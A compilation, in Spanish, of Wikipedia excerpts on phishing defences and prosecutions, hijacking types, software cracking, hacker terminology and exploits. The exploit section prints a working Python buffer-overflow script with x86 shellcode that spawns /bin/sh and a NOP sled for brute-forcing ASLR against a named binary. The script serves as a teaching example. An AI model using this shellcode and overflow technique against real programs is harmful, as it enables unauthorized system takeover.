Hay varios programas informáticos anti-phishing disponibles. La mayoría de estos programas trabajan identificando contenidos phishing en sitios web y correos electrónicos; algunos software anti-phishing pueden por ejemplo, integrarse con los navegadores web y clientes de correo electrónico como una barra de herramientas que muestra el dominio real del sitio visitado. Los filtros de spam también ayudan a proteger a los usuarios de los phishers, ya que reducen el número de correos electrónicos relacionados con el phishing recibidos por el usuario.
Muchas organizaciones han introducido la característica denominada pregunta secreta, en la que se pregunta información que sólo debe ser conocida por el usuario y la organización. Las páginas de Internet también han añadido herramientas de verificación que permite a los usuarios ver imágenes secretas que los usuarios seleccionan por adelantado; sí estas imágenes no aparecen, entonces el sitio no es legítimo. Estas y otras formas de autentificación mutua continúan siendo susceptibles de ataques, como el sufrido por el banco escandinavo Nordea a finales de 2005.
Muchas compañías ofrecen a bancos y otras entidades que sufren de ataques de phishing, servicios de monitoreo continuos, analizando y utilizando medios legales para cerrar páginas con contenido phishing.
El Anti-Phishing Working Group, industria y asociación que aplica la ley contra las prácticas de phishing, ha sugerido que las técnicas convencionales de phishing podrían ser obsoletas en un futuro a medida que la gente se oriente sobre los métodos de ingeniería social utilizadas por los phishers. Ellos suponen que en un futuro cercano, el pharming y otros usos de malware se van a convertir en herramientas más comunes para el robo de información.

Respuestas legislativas y judiciales

El 26 de enero de 2004, la FTC (Federal Trade Commission, "Comisión Federal de Comercio") de Estados Unidos llevó a juicio el primer caso contra un phisher sospechoso. El acusado, un adolescente de California, supuestamente creó y utilizó una página web con un diseño que aparentaba ser la página de America Online para poder robar números de tarjetas de crédito. Tanto Europa como Brasil siguieron la práctica de los Estados Unidos, rastreando y arrestando a presuntos phishers. A finales de marzo de 2005, un hombre estonio de 24 años fue arrestado utilizando una backdoor, a partir de que las víctimas visitaron su sitio web falso, en el que incluía un keylogger que le permitía monitorear lo que los usuarios tecleaban. Del mismo modo, las autoridades arrestaron al denominado phisher kingpin, Valdir Paulo de Almeida, líder de una de las más grandes redes de phishing que en dos años había robado entre $18 a $37 millones de dólares estadounidenses. En junio del 2005 las autoridades del Reino Unido arrestaron a dos hombres por la práctica del phishing, en un caso conectado a la denominada Operation Firewall del Servicio Secreto de los Estados Unidos, que buscaba sitios web notorios que practicaban el phishing.
En los Estados Unidos, el senador Patrick Leahy introdujo el Acta Anti-Phishing de 2005 el 1 de marzo de 2005. Esta ley federal de anti-phishing establecía que aquellos criminales que crearan páginas web falsas o enviaran spam a cuentas de e-mail con la intención de estafar a los usuarios podrían recibir una multa de hasta $250,000 USD y penas de cárcel por un término de hasta cinco años.
La compañía Microsoft también se ha unido al esfuerzo de combatir el phishing. El 31 de marzo del 2005, Microsoft llevó a la Corte del Distrito de Washington 117 pleitos federales. En algunos de ellos se acusó al denominado phisher "John Doe" por utilizar varios métodos para obtener contraseñas e información confidencial. Microsoft espera desenmascarar con estos casos a varios operadores de phishing de gran envergadura. En marzo del 2005 también se consideró la asociación entre Microsoft y el gobierno de Australia para educar sobre mejoras a la ley que permitirían combatir varios crímenes cibernéticos, incluyendo el phishing.

Fuente: http://es.wikipedia.org/wiki/Phishing

Hijacking

Hijacking significa "secuestro" en inglés y en el ámbito informático hace referencia a toda técnica ilegal que lleve consigo el adueñarse o robar algo (generalmente información) por parte de un atacante. Es por tanto un concepto muy abierto y que puede aplicarse a varios ámbitos, de esta manera podemos encontramos con el secuestro de conexiones de red, sesiones de terminal, servicios, modems y un largo etcétera en cuanto a servicios informáticos se refiere.

Algunos ejemplos de Hijacking [editar]

  • IP hijakers: secuestro de una conexión TCP/IP por ejemplo durante una sesión Telnet permitiendo a un atacante inyectar comandos o realizar un DoS durante dicha sesión.
  • Page hijacking: secuestro de página web. Hace referencia a las modificaciones que un atacante realiza sobre una página web, normalmente haciendo uso de algún bug de seguridad del servidor o de programación del sitio web, también es conocido como defacement o desfiguración.
  • Reverse domain hijacking o Domain hijacking: secuestro de dominio
  • Session hijacking: secuestro de sesión
  • Browser hijacking: (Secuestro de navegadores en español). Se llama así al efecto de apropiación que realizan algunos spyware sobre el navegador web lanzando popups, modificando la página de inicio, modificando la página de búsqueda predeterminada etc. Es utilizado por un tipo de software malware el cual altera la configuración interna de los navegadores de internet de un ordenador. El termino "secuestro" hace referencia a que éstas modificaciones se hacen sin el permiso y el conocimiento del usuario. Algunos de éstos son fáciles de eliminar del sistema, mientras que otros son extremadamente complicados de eliminar y revertir sus cambios.
  • Home Page Browser hijacking: secuestro de la página de inicio del navegador. Esto sucede cuando la página de inicio, en la que navegamos es cambiada por otra a interés del secuestrador. Generalmente son páginas en las que nos invita a usar los servicios de la página para que nuestro equipo esté seguro y funcione correctamente. No cabe decir que es a cambio de un pago y que el origen del error y mal funcionamiento del equipo es debido a nuestro secuestrador
  • Modem hijacking: secuestro del Modem. Esta expresión es en ocasiones utilizada para referirse a la estafa de los famosos dialers que tanta guerra dieron en su día (antes del auge del ADSL) y que configuran sin el consentimiento del usuario nuevas conexiones a números de cobro extraordinario.
  • Thread hijacking: secuestro de un "tema" dentro de un foro de discusión de internet. Este termino hace referencia a la situación que ocurre cuando dentro de un tema de discusión en un foro alguien intenta dirigir el hilo de la conversación hacia asuntos que no tienen nada que ver con el tema inicial. Esto puede realizarse de manera intencionada para irritar al autor del tema o bien producirse de manera natural y no intencionada generalmente por usuarios sin mucho conocimiento en el asunto a tratar o que desconocen la dinámica de comportamiento de los foros.
Fuentes: http://es.wikipedia.org/wiki/Hijacking

Cracking

El cracking es la modificación del software con la intención de eliminar los métodos de protección de los cuales este disponga: protección de copias, versiones de prueba, números de serie, claves de hardware, verificación de fechas, verificación de CD o publicidad y adware.
La distribución y uso de copias modificadas es ilegal en casi todos los países desarrollados. Muchos juicios se han llevado a cabo debido al cracking de software; sin embargo, la mayoría de estos han tenido que ver con la distribución de copias duplicadas en vez de con el proceso de quebrantar la protección, debido a la dificultdad de construir pruebas válidas de culpabilidad individual en el segundo caso. En Estados Unidos, la aprobación de la Digital Millennium Copyright Act (DMCA) declaró a la modificación de software, así como a la distribución de información que habilita el cracking de software, ilegal. Sin embargo, la ley ha sido apenas probada en el poder judicial de EE. UU. en casos de ingeniería inversa para único uso personal. La Unión Europea aprobó la Directiva de la Unión Europea sobre derecho de autor en mayo de 2001, haciendo la infracción de los derechos de autor de software ilegal en los estados miembros, una vez que la legislación nacional fuera promulgada en favor de la directiva.

Fuente: http://es.wikipedia.org/wiki/Cracking_%28software%29

Hacker

En informática, un hacker[1] es una persona que pertenece a una de estas comunidades o subculturas distintas pero no completamente independientes:
El emblema hacker, un proyecto para crear un símbolo reconocible para la percepción de la cultura hacker.
  • Gente apasionada por la seguridad informática. Esto concierne principalmente a entradas remotas no autorizadas por medio de redes de comunicación como Internet ("Black hats"). Pero también incluye a aquellos que depuran y arreglan errores en los sistemas ("White hats") y a los de moral ambigua como son los "Grey hats".
En la actualidad se usa de forma corriente para referirse mayormente a los criminales informáticos, debido a su utilización masiva por parte de los medios de comunicación desde la década de 1980. A los criminales se le pueden sumar los llamados "script kiddies", gente que invade computadoras, usando programas escritos por otros, y que tiene muy poco conocimiento sobre como funcionan. Este uso parcialmente incorrecto se ha vuelto tan predominante que, en general, un gran segmento de la población no es consciente de que existen diferentes significados.
Mientras que los hackers aficionados reconocen los tres tipos de hackers y los hackers de la seguridad informática aceptan todos los usos del término, los hackers del software libre consideran la referencia a intrusión informática como un uso incorrecto de la palabra, y se refieren a los que rompen los sistemas de seguridad como "crackers" (analogía de "safecracker", que en español se traduce como "un ladrón de cajas fuertes").





































Controversia de la definición de hacker

Los términos hacker y hack tienen connotaciones positivas e, irónicamente, también negativas. Los programadores informáticos suelen usar las hacking y hacker para expresar admiración por el trabajo de un desarrollador de software calificado, pero también se puede utilizar en un sentido negativo para describir una solución rápida pero poco elegante a un problema. Algunos desaprueban el uso del hacking como un sinónimo de cracker, en marcado contraste con el resto del mundo, en el que la palabra hacker se utiliza normalmente para describir a alguien que "hackea" un sistema con el fin de eludir o desactivar las medidas de seguridad.

Controversia y ambigüedad

En un principio se utilizaba "hack" como verbo para expresar "perder el tiempo" (e.j. "Puedo hackear con el ordenador"), el significado del término ha cambiado a lo largo de décadas desde que empezó a utilizarse en un contexto informático. Como su uso se ha extendido más ampliamente, el significado primario de la palabra, por parte de los nuevos usuarios, ha pasado a uno que entra en conflicto con el énfasis original.

Activismo

Desde el año 2002-2003, se ha ido configurando una perspectiva más amplia del hacker, pero con una orientación a su integración al hacktivismo en tanto movimiento. Aparecen espacios autónomos denominados hacklab y los hackmeeting como instancias de diálogo de hackers. Desde esta perspectiva, se entiende al hacker como una persona que es parte de una conciencia colectiva que promueve la libertad del conocimiento y la justicia social.
En este caso, los roles de un hacker pueden entenderse en cuatro aspectos:
  • Apoyar procesos de apropiación social o comunitaria de las tecnologías.
  • Poner a disposición del dominio público el manejo técnico y destrezas alcanzadas personal o grupalmente.
  • Crear nuevos sistemas, herramientas y aplicaciones técnicas y tecnológicas para ponerlas a disposición del dominio público.
  • Realizar acciones de hacktivismo tecnológico con el fin de liberar espacios y defender el conocimiento común, o mancomunal

Terminología

White hat y black hat

Un hacker de sombrero blanco (del inglés, White hats), en jerga informática, se refiere a una ética hacker que se centra en asegurar y proteger los sistemas de Tecnologías de información y comunicación.[5] Estas personas suelen trabajar para empresas de seguridad informática las cuales los denominan, en ocasiones, «zapatillas o equipos tigre».[6]
Por el contrario, un hacker de sombrero negro (del inglés, Black Hat) es el villano o chico malo, especialmente en una película de western, de ahí que en tal carácter se use un sombrero negro, en contraste con el héroe, el de sombrero blanco.
También conocidos como "crackers" muestran sus habilidades en informática rompiendo sistemas de seguridad de computadoras, colapsando servidores, entrando a zonas restringidas, infectando redes o apoderándose de ellas, entre otras muchas cosas utilizando sus destrezas en métodos hacking.
En los últimos años, los términos sombrero blanco y un sombrero negro han sido aplicados a la industria del posicionamiento en buscadores (Search Engine Optimization, SEO). Las tácticas de posicionamiento en buscadores de los hackers de sombrero negro, también llamada spamdexing, intento de redireccionar los resultados de la búsqueda a páginas de destino particular, son una moda que está en contra de los términos de servicio de los motores de búsqueda, mientras que los hackers de sombrero blanco, utilizan métodos que son generalmente aprobados por los motores de búsqueda.

Samurái

Normalmente es alguien contratado para investigar fallos de seguridad, que investiga casos de derechos de privacidad, esté amparado por la primera enmienda estadounidense o cualquier otra razón de peso que legitime acciones semejantes. Los samuráis desdeñan a los crackers y a todo tipo de vándalos electrónicos. También se dedican a hacer y decir cómo saber sobre la seguridad con sistemas en redes[7]

Phreaker

Artículo principal: Phreaker
De phone freak ("monstruo telefónico"). Son personas con conocimientos tanto en teléfonos modulares (TM) como en teléfonos móviles, se encuentran sumergidos en entendimientos de telecomunicaciones bastante amplios.

Wannabe

Generalmente son aquellos a los que les interesa el tema de hacking y/o phreaking pero que por estar empezando no son reconocidos por la elite. Son aquellos que si perseveran aprendiendo y estudiando, pueden llegar a convertirse perfectamente en hackers. No por ser novato es repudiado, al igual que tampoco hay que confundirlo con un lammer.

Lammer o script-kiddies

Artículos principales: Lammer y Script kiddie
Es un término coloquial inglés aplicado a una persona falta de madurez, sociabilidad y habilidades técnicas o inteligencia, un incompetente, que por lo general pretenden hacer hacking sin tener conocimientos de informática. Solo se dedican a buscar y descargar programas de hacking para luego ejecutarlos, como resultado de la ejecución de los programas descargados estos pueden terminar colapsando sus sistemas por lo que en general acaban destrozando la plataforma en la que trabajan.
Son aprendices que presumen ser lo que no son, aprovechando los conocimientos del hacker y poniéndolos en práctica, sin saber. En pocas palabras, no saben nada de hacking o roban programas de otros, frecuentemente recién hechos, y dicen que los crearon ellos.

Newbie

Artículo principal: Newbie
Newbie es un término utilizado comúnmente en comunidades en línea para describir a un novato, en esta area, es el que no posee muchos conocimientos en el tema.

 Fuente: http://es.wikipedia.org/wiki/Hacker_%28inform%C3%A1tica%29

Exploit

Exploit (del inglés to exploit, explotar o aprovechar) es una pieza de software, un fragmento de datos, o una secuencia de comandos con el fin de automatizar el aprovechamiento de un error, fallo o vulnerabilidad, a fin de causar un comportamiento no deseado o imprevisto en los programas informáticos, hardware, o componente electrónico (por lo general computarizado). Con frecuencia, esto incluye cosas tales como la violenta toma de control de un sistema de cómputo o permitir la escalada de privilegios o un ataque de denegación de servicio. El fin del Exploit puede ser violar las medidas de seguridad para poder acceder al mismo de forma no autorizada y emplearlo en beneficio propio o como origen de otros ataques a terceros.
Los Exploits pueden ser escritos empleando una diversidad de lenguajes de programación, aunque mayoritariamente se suele utilizar lenguaje C. También puede aprovecharse de distintos tipos de ataques tales como desbordamiento de búfer, Cross Site Scripting, Format Strings, Inyección SQL, entre otros.
Un ejemplo de un exploit, que se aprovecha de un desbordamiento de búfer escrito en lenguaje Python sería:
#!/usr/bin/env python
import os
import sys
import time
 
class Exploit:
 
   def __init__(self):
      if len(sys.argv) <> 2:
         print "\n[*] Usage: python exploit.py /path/binary\n"
         exit() 
      else:
         self.arg2=sys.argv[1]
         # Command=/bin/sh Size=24 bytes Bind=No         
         self.shellcode = ("\x99\x31\xc0\x52\x68\x6e\x2f\x73"
                           "\x68\x68\x2f\x2f\x62\x69\x89\xe3"
                           "\x52\x53\x89\xe1\xb0\x0b\xcd\x80")                    
 
         self.payload  = '\x41'*1036            # Padding 0x41 (A)   
         self.payload += '\x70\x9b\x80\xbf'     # Magic Address -> 0xbf809b70
         self.payload += '\x90'*10000           # 0x90 (NOP) x 10000
         # The ASLR begin at the memory address 0xbf80010#i1
 
   def loop(self):
      print "\n[+] Starting Explotation...\n"
      time.sleep(2)
 
      while True:
         os.system(self.arg2 + ' ' + self.payload + self.shellcode)
 
"""Start execution"""
if __name__ == '__main__':
   union=Exploit()    
   conector=union.loop()
exit()
Una de las herramientas más utilizadas para trabajar con este tipo de software es Metasploit Framework, una plataforma de test de penetración escrita en lenguaje de programación Ruby, como así también otros frameworks como Core Impact, Canvas, entre otros.

Fuente: http://es.wikipedia.org/wiki/Exploit